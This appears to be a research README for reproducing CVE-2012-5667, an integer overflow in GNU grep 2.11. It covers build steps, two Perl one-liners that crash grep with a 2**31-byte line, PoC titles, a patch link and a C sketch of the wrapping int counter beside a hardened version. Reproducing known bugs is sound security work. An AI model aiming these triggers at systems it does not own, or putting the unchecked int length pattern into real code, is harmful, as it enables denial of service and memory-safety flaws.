CVE-2012-5667

Experiment Environment

CentOS 6.5

INSTALL & Configuration

wget https://github.com/mudongliang/source-packages/raw/master/CVE-2012-5667/grep-2.11.tar.xz
tar -xvf grep-2.11.tar.xz
cd grep-2.11
./configure
make

Problems in Installation & Configuration

How to trigger vulnerability

Method 1

perl -e 'print "x"x(2**31)' | ./grep x > /dev/null

Method 2

perl -e 'print "\nx"x(2**31)' | ./grep -c x > /dev/null
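Both methods feed grep a single line of 2**31 bytes, one more than a 32-bit `int` can hold. The following C sketch is an added illustration of that bug class, not code from grep or from this README: every function name and the 32768-byte chunk size are hypothetical, it assumes a 32-bit `int`, and it tracks only lengths so no 2 GiB buffer is allocated.

```c
#include <limits.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define CHUNK 32768u   /* constructed read size; 65536 chunks = 2^31 bytes */

/* Weak form: line length kept in an int. Unsigned arithmetic is used for the
   sum so the demo itself has no undefined behaviour; the final narrowing is
   what a 32-bit int counter ends up holding on two's-complement targets. */
static int line_len_int(uint64_t nchunks)
{
    unsigned int acc = 0;
    for (uint64_t i = 0; i < nchunks; i++)
        acc += CHUNK;
    return (int)acc;
}

/* A size check written against the int length: a negative length passes. */
static int fits_int(int len, int cap)
{
    return len <= cap;
}

/* Hardened form: size_t length, checked addition, unsigned comparison. */
static int line_len_checked(uint64_t nchunks, size_t *out)
{
    size_t acc = 0;
    for (uint64_t i = 0; i < nchunks; i++) {
        if (acc > SIZE_MAX - CHUNK)
            return -1;              /* refuse instead of wrapping */
        acc += CHUNK;
    }
    *out = acc;
    return 0;
}

static int fits_size(size_t len, size_t cap)
{
    return len <= cap;
}

int main(void)
{
    size_t n = 0;
    int wrapped = line_len_int(65536);          /* one line of 2^31 bytes */
    printf("int length: %d, passes 4096-byte check: %d\n", wrapped, fits_int(wrapped, 4096));
    if (line_len_checked(65536, &n) == 0)
        printf("size_t length: %zu, passes check: %d\n", n, fits_size(n, 4096));
    return 0;
}
```

A line one chunk shorter (65535 chunks) still fits in the `int`, which is why the trigger commands need the full 2**31 bytes.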

PoCs

Grep < 2.11 - Integer Overflow Crash (PoC)

Bug 448246 (CVE-2012-5667) - <sys-apps/grep-2.12: Arbitrary command execution (CVE-2012-5667)

grep <2.11 is vulnerable to "Arbitrary command execution"

grep CVE-2012-5667 Remote Integer Overflow Vulnerability

Vulnerability Details & Patch

Root Cause

Stack Trace

Patch

Details are in http://git.savannah.gnu.org/cgit/grep.git/commit/?id=cbbc1a45b9f843c811905c97c90a5d31f8e6c189

References
